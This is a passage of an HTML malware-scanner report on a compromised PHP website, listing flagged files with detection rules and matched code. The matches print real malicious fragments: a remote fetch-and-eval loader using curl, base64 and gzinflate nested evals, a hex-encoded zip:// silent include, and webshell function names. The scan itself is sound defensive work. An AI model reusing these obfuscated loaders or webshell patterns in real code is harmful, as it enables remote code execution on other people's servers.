</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_111").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.84 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_112" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">46</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">63</span><span style="color: #007700">](${</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">46</span><span style="color: #007700">]}[</span><span style="color: #0000BB">29</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">HcatRPWIjg</span><span style="color: #007700">(</span><span style="color: #0000BB">$pWG</span><span style="color: #007700">) { </span><span style="color: #0000BB">$Pj </span><span style="color: #007700">= </span><span style="color: #DD0000">"range"</span><span style="color: #007700">; </span><span style="color: #0000BB">$KnLtFY </span><span style="color: #007700">= </span><span style="color: #0000BB">$Pj</span><span style="color: #007700">(</span><span style="color: #DD0000">"~"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">); </span><span style="color: #0000BB">$UhWHmtLbj </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"+"</span><span style="color: #007700">, </span><span style="color: #0000BB">$pWG</span><span style="color: #007700">); </span><span style="color: #0000BB">$yIi </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">; foreach (</span><span style="color: #0000BB">$UhWHmtLbj </span><span style="color: #007700">as </span><span style="color: #0000BB">$xVezngjcT </span><span style="color: #007700">=> </span><span style="color: #0000BB">$YJcA</span><span style="color: #007700">) </span><span style="color: #0000BB">$yIi </span><span style="color: #007700">.= </span><span style="color: #0000BB">$KnLtFY</span><span style="color: #007700">[</span><span style="color: #0000BB">$YJcA </span><span style="color: #007700">- </span><span style="color: #0000BB">18208</span><span style="color: #007700">]; return </span><span style="color: #0000BB">$yIi</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">aCrByTXh</span><span style="color: #007700">(</span><span style="color: #0000BB">$KRxNLTAwi</span><span style="color: #007700">, </span><span style="color: #0000BB">$aibI</span><span style="color: #007700">) { </span><span style="color: #0000BB">$jUXp </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">$ZAWMhN </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$jUXp</span><span style="color: #007700">); return empty(</span><span style="color: #0000BB">$ZAWMhN</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$aibI</span><span style="color: #007700">(</span><span style="color: #0000BB">$KRxNLTAwi</span><span style="color: #007700">) : </span><span style="color: #0000BB">$ZAWMhN</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">cyLngfvRub</span><span style="color: #007700">() { </span><span style="color: #0000BB">$pHbw </span><span style="color: #007700">= array(</span><span style="color: #DD0000">"18235+18220+18233+18237+18218+18233+18239+18232+18217+18224+18235+18218+18229+18223+18224"</span><span style="color: #007700">,</span><span style="color: #DD0000">"18219+18218+18220+18239+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silenced_eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@eval(</span><span style="color: #0000BB">$LkFG</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">+</span><span style="color: #0000BB">1</span><span style="color: #007700">](</span><span style="color: #0000BB">$qPk</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">63</span><span style="color: #007700">](${</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">46</span><span style="color: #007700">]}[</span><span style="color: #0000BB">29</span><span style="color: #007700">])); } </span><span style="color: #0000BB">metaphone</span><span style="color: #007700">(</span><span style="color: #DD0000">"9Iooq1BfVvQ+Q5m8mEraqvo0WsfIF1iRr49vaTJqaf0"</span><span style="color: #007700">); class </span><span style="color: #0000BB">exgN</span><span style="color: #007700">{ static function </span><span style="color: #0000BB">HcatRPWIjg</span><span style="color: #007700">(</span><span style="color: #0000BB">$pWG</span><span style="color: #007700">) { </span><span style="color: #0000BB">$Pj </span><span style="color: #007700">= </span><span style="color: #DD0000">"r"</span><span style="color: #007700">.</span><span style="color: #DD0000">"a"</span><span style="color: #007700">.</span><span style="color: #DD0000">"n"</span><span style="color: #007700">.</span><span style="color: #DD0000">"g"</span><span style="color: #007700">.</span><span style="color: #DD0000">"e"</span><span style="color: #007700">; </span><span style="color: #0000BB">$KnLtFY </span><span style="color: #007700">= </span><span style="color: #0000BB">$Pj</span><span style="color: #007700">(</span><span style="color: #DD0000">"~"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">); </span><span style="color: #0000BB">$UhWHmtLbj </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"+"</span><span style="color: #007700">, </span><span style="color: #0000BB">$pWG</span><span style="color: #007700">); </span><span style="color: #0000BB">$yIi </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">; foreach (</span><span style="color: #0000BB">$UhWHmtLbj </span><span style="color: #007700">as </span><span style="color: #0000BB">$xVezngjcT </span><span style="color: #007700">=> </span><span style="color: #0000BB">$YJcA</span><span style="color: #007700">) </span><span style="color: #0000BB">$yIi </span><span style="color: #007700">.= </span><span style="color: #0000BB">$KnLtFY</span><span style="color: #007700">[</span><span style="color: #0000BB">$YJcA </span><span style="color: #007700">- </span><span style="color: #0000BB">18208</span><span style="color: #007700">]; return </span><span style="color: #0000BB">$yIi</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">aCrByTXh</span><span style="color: #007700">(</span><span style="color: #0000BB">$KRxNLTAwi</span><span style="color: #007700">, </span><span style="color: #0000BB">$aibI</span><span style="color: #007700">) { </span><span style="color: #0000BB">$jUXp </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(</span><span style="color: #0000BB">$KRxNLTAwi</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$jUXp</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">$ZAWMhN </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$jUXp</span><span style="color: #007700">); return empty(</span><span style="color: #0000BB">$ZAWMhN</span><span style="color: #007700">) ? $...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_112").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 375.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:41:35</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:41:35</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_113" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$WIv</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@include_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x77\x6d\x76\x5f\x36\x39\x37\x37\x30\x63\x39\x66\x31\x37\x64\x33\x34\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x37\x30\x63\x39\x66\x31\x37\x64\x33\x34\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">include_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_113").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 423.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:41:35</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:41:35</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_114" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$WIv</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_114").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/fmndn.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-02-04 16:45:58</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_115" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 785</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_115").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/rclfv.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:16:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:16:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_116" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
